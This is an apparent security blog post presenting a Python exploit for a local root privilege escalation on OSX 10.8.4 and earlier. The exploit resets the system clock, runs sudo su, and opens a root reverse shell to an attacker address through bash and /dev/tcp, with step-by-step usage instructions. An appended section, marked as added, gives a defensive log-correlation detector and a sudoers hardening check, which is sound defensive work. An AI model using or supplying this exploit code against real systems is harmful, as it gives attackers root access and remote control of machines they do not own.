August 29, 2013

OSX Local Root Privilege Escalation Exploit

Written by David Kennedy
About five months ago, a bug was disclosed in which the Date & Time settings on OSX 10.8.4 and below can be used to perform a local privilege escalation from a normal user to root. The original flaw is a bug in Unix and sudo: changing the system date and time lets a normal user escalate to root permissions. The flaw was recently added to the Metasploit Framework by Todd Miller (original bug discovery), Joev (wrote the module), and Juan Vazquez (bug testing and module fixing). This is a super simple exploit, and if you don't have access to a Metasploit shell, here's a simple Python exploit you can run locally that will pipe a reverse OSX bash shell back to you with root privileges.
```python
#!/usr/bin/python
###################################################################################################
# Exploit Title: OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell
# Date: 08-27-2013
# Exploit Author: David Kennedy @ TrustedSec
# Website: https://www.trustedsec.com
# Twitter: @Dave_ReL1K
# Tested On: OSX 10.8.4
#
# Reference: http://www.exploit-db.com/exploits/27944/
#
# Example below:
# trustedsec:Desktop Dave$ python osx_esc.py
# [*] Exploit has been performed. You should have a shell on ipaddr: 127.0.0.1 and port 4444
#
# attacker_box:~ Dave$ nc -l 4444
# bash: no job control in this shell
# bash-3.2#
###################################################################################################
import subprocess

# IPADDR for REVERSE SHELL - change this to your attacker IP address
ipaddr = "192.168.1.1"

# PORT for REVERSE SHELL - change this to your attacker port address
port = "4444"

# drop into a root shell - replace 192.168.1.1 with the reverse listener
# (the commands are fed to bash on stdin as two lines: the clock reset plus sudo, then the reverse shell)
proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr, port))
print """
###############################################################
#
# OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell
#
# Written by: David Kennedy @ TrustedSec
# Website: https://www.trustedsec.com
# Twitter: @Dave_ReL1K
#
# Reference: http://www.exploit-db.com/exploits/27944/
###############################################################
"""
print "[*] Exploit has been performed. You should have a shell on ipaddr: %s and port %s" % (ipaddr, port)
```

Just edit the file, set the reverse IP address and port to your attacker box, start netcat or a standard socket listener on that port on the attacker machine, run python osx_exploit.py, and enjoy a reverse shell. Reference: http://www.exploit-db.com/exploits/27944/
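For the defensive side of the same technique, here is an added example (not the author's code and not part of the original post) that shows what a detection and a hardening check look like. The technique above has two observable steps: a `systemsetup` call that drops the clock to the Unix epoch, followed within seconds by a `sudo` run by the same user. The script parses constructed syslog-style lines (the line format, host name, user names and `ASSUMED_YEAR` are assumptions made for this example, not a real macOS log format), correlates the two steps per user inside a short window, and separately checks a sudoers fragment for `Defaults timestamp_timeout=0`, the sudo option that makes sudo prompt for a password on every invocation so that no cached authentication exists for a clock change to revive. The sudoers parser is deliberately simplified (one file, no `@include`).

```python
import re
from datetime import datetime, timedelta

# Constructed syslog-style sample lines for this example; the format is an
# assumption, not a real macOS log format. Syslog lines carry no year, so the
# parser fills in ASSUMED_YEAR.
ASSUMED_YEAR = 2013
SAMPLE_LOG = """\
Aug 29 10:15:01 mac1 systemsetup[512]: user=dave argv=systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00
Aug 29 10:15:02 mac1 sudo[513]: dave : TTY=ttys000 ; PWD=/Users/dave ; USER=root ; COMMAND=/usr/bin/su
Aug 29 11:02:44 mac1 systemsetup[640]: user=alice argv=systemsetup -settimezone Europe/Berlin
Aug 29 11:30:10 mac1 sudo[701]: alice : TTY=ttys001 ; PWD=/Users/alice ; USER=root ; COMMAND=/usr/bin/vim /etc/hosts
"""

LINE_RE = re.compile(r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ (?P<prog>\w+)\[\d+\]: (?P<msg>.*)$")
SYSSETUP_RE = re.compile(r"^user=(?P<user>\S+) argv=(?P<argv>.*)$")
SETDATE_RE = re.compile(r"-setdate\s+(?P<mm>\d\d):(?P<dd>\d\d):(?P<yyyy>\d{4})")  # mm:dd:yyyy as in the post
SUDO_RE = re.compile(r"^(?P<user>\S+) : .*COMMAND=(?P<cmd>.*)$")


def parse_events(text):
    """Reduce raw lines to the two event kinds the detection needs:
    'clock_reset' (systemsetup setting the date to 1970 or earlier) and 'sudo'."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S").replace(year=ASSUMED_YEAR)
        prog, msg = m.group("prog"), m.group("msg")
        if prog == "systemsetup":
            s, d = SYSSETUP_RE.match(msg), SETDATE_RE.search(msg)
            if s and d and int(d.group("yyyy")) <= 1970:
                events.append({"ts": ts, "kind": "clock_reset", "user": s.group("user"), "detail": s.group("argv")})
        elif prog == "sudo":
            s = SUDO_RE.match(msg)
            if s:
                events.append({"ts": ts, "kind": "sudo", "user": s.group("user"), "detail": s.group("cmd")})
    return events


def find_clock_reset_then_sudo(events, window=timedelta(minutes=5)):
    """Flag each sudo run that follows, within `window`, a clock reset by the same user."""
    hits = []
    resets = [e for e in events if e["kind"] == "clock_reset"]
    for sudo in (e for e in events if e["kind"] == "sudo"):
        for r in resets:
            if r["user"] == sudo["user"] and timedelta(0) <= sudo["ts"] - r["ts"] <= window:
                hits.append({"user": sudo["user"], "reset_ts": r["ts"], "sudo_ts": sudo["ts"], "command": sudo["detail"]})
                break
    return hits


# Constructed sudoers fragments: the first keeps sudo's default credential cache,
# the second disables it with timestamp_timeout=0.
SUDOERS_WEAK = "Defaults env_reset\n%admin ALL=(ALL) ALL\n"
SUDOERS_HARDENED = "Defaults env_reset, timestamp_timeout=0  # always prompt\n%admin ALL=(ALL) ALL\n"

DEFAULTS_RE = re.compile(r"^Defaults(?:[:@!>]\S+)?\s+(?P<opts>.+)$")
TIMEOUT_RE = re.compile(r"^timestamp_timeout\s*=\s*(?P<val>-?\d+(?:\.\d+)?)$")


def cached_credentials_disabled(sudoers_text):
    """True if a Defaults line sets timestamp_timeout=0, so sudo never reuses a cached
    authentication and a clock change has no timestamp to make valid again."""
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        m = DEFAULTS_RE.match(line)
        if not m:
            continue
        for opt in m.group("opts").split(","):
            t = TIMEOUT_RE.match(opt.strip())
            if t and float(t.group("val")) == 0:
                return True
    return False


if __name__ == "__main__":
    for hit in find_clock_reset_then_sudo(parse_events(SAMPLE_LOG)):
        print("clock reset followed by sudo: user=%s reset=%s sudo=%s cmd=%s"
              % (hit["user"], hit["reset_ts"], hit["sudo_ts"], hit["command"]))
    print("weak sudoers disables cache:", cached_credentials_disabled(SUDOERS_WEAK))
    print("hardened sudoers disables cache:", cached_credentials_disabled(SUDOERS_HARDENED))
```

Run on the sample, only `dave` is flagged: `alice` changes a time zone and later uses sudo, but never sets the date to the epoch, so the per-user window correlation keeps ordinary admin activity out of the alert. The correlation key (same user, reset before sudo, short window) is the part worth carrying into a real log pipeline; the regexes are specific to the constructed format and would be replaced by whatever your logging source emits for `systemsetup` and `sudo`.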